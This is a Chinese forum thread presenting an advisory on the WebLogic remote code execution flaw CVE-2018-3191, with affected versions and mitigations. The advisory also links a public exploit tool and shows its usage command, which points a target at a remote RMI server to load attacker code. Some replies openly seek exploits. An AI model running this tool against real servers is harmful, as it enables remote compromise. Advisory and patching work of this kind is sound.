anonymou5

 找回密码
 立即注册
搜索
查看: 233|回复: 9

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具

[复制链接]
匿名
匿名  发表于 2018-10-23 10:38:30 |阅读模式
本帖最后由 匿名 于 2018-10-23 10:39 编辑



1.1 背景

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击网络服务器被攻击者接受,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,李正东申报通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致。

有人已经复现成功,



而且发现已经被灰产写成批量入侵工具,还在服务器上跑着呢!



所以呢,有一大波肉鸡在路上,如果你不想成为肉鸡,尽快修复!

1.2 漏洞编号

CVE-2018-3191

1.3 漏洞等级

高危

二、修复建议

2.1 受影响版本

WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3

2.2 漏洞检测

检查WebLogic的版本号是否为受影响版本。

检查是否开启了WebLogic的T3服务。

2.3 解决方案

Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

1.过滤T3协议
2.设置Nginx反向代理
3.升级到最新JDK

JEP290(JDK8u121,7u131,6u141)

工具指定要带着的,

https://github.com/voidfyoo/CVE-2018-3191/releases
https://github.com/voidfyoo/CVE-2018-3191

用法:
  1. java -jar weblogic-spring-jndi.jar <jndi_address>
复制代码
例如:
  1. java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
复制代码
笔记

Weblogic-spring-jndi-12.2.1.3.jar 对于weblogic:
  1. 12.2.1.3
复制代码
Weblogic-spring-jndi-10.3.6.0.jar 对于weblogic:
  1. 10.3.6.0
  2. 12.2.1.0
  3. 12.1.3.0
  4. 12.2.1.1
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

0

主题

26

帖子

101

积分

注册会员

Rank: 2

积分
101
发表于 2018-10-23 23:15:17 | 显示全部楼层
本帖最后由 ahmadbad 于 2018-10-23 23:56 编辑

Big thanks for you i was waiting for any exploit for weblgoic
回复

使用道具 举报

匿名
匿名  发表于 2018-10-23 23:56:31
ahmadbad 发表于 2018-10-23 23:15
Big thanks for you i was waiting for any exploit for weblgoic  i just hope you give us the poc ...

Excuse me, this site is in Chinese. Do you translate through tools?
回复

使用道具 举报

匿名
匿名  发表于 2018-10-23 23:57:39
ahmadbad 发表于 2018-10-23 23:15
Big thanks for you i was waiting for any exploit for weblgoic

There is a usage in this article.
回复

使用道具 举报

0

主题

26

帖子

101

积分

注册会员

Rank: 2

积分
101
发表于 2018-10-23 23:58:47 | 显示全部楼层
匿名者 发表于 2018-10-23 23:56
Excuse me, this site is in Chinese. Do you translate through tools?

yes sometime when i need to i want to learn Chinese but its so hard to learn
回复

使用道具 举报

匿名
匿名  发表于 2018-10-24 00:02:53
ahmadbad 发表于 2018-10-23 23:58
yes sometime when i need to i want to learn Chinese but its so hard to learn

Chinese is the most difficult language in the world. It's late at night. It's time to go to bed. Good night.
回复

使用道具 举报

0

主题

26

帖子

101

积分

注册会员

Rank: 2

积分
101
发表于 2018-10-24 00:06:25 | 显示全部楼层
匿名者 发表于 2018-10-24 00:02
Chinese is the most difficult language in the world. It's late at night. It's time to go to bed. G ...

yes it is but i hope i can learn it  someday i like  Chinese people    Good night
回复

使用道具 举报

0

主题

19

帖子

81

积分

注册会员

Rank: 2

积分
81
发表于 2018-10-26 11:21:59 | 显示全部楼层
匿名者 发表于 2018-10-24 00:02
Chinese is the most difficult language in the world. It's late at night. It's time to go to bed. G ...

your english is pretty good!!!!
回复

使用道具 举报

0

主题

26

帖子

101

积分

注册会员

Rank: 2

积分
101
发表于 2018-10-27 08:19:33 | 显示全部楼层
anlong 发表于 2018-10-26 15:26
谁有这个利用? https://download.csdn.net/download/sinat_26474359/10650605 I mean that one exactly, no ...

i have weblogic cmd if its the one you  means ??
回复

使用道具 举报

匿名
匿名  发表于 2018-10-28 00:29:31
This site was attacked by DDoS.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2018-11-20 19:22 , Processed in 0.112703 second(s), 21 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表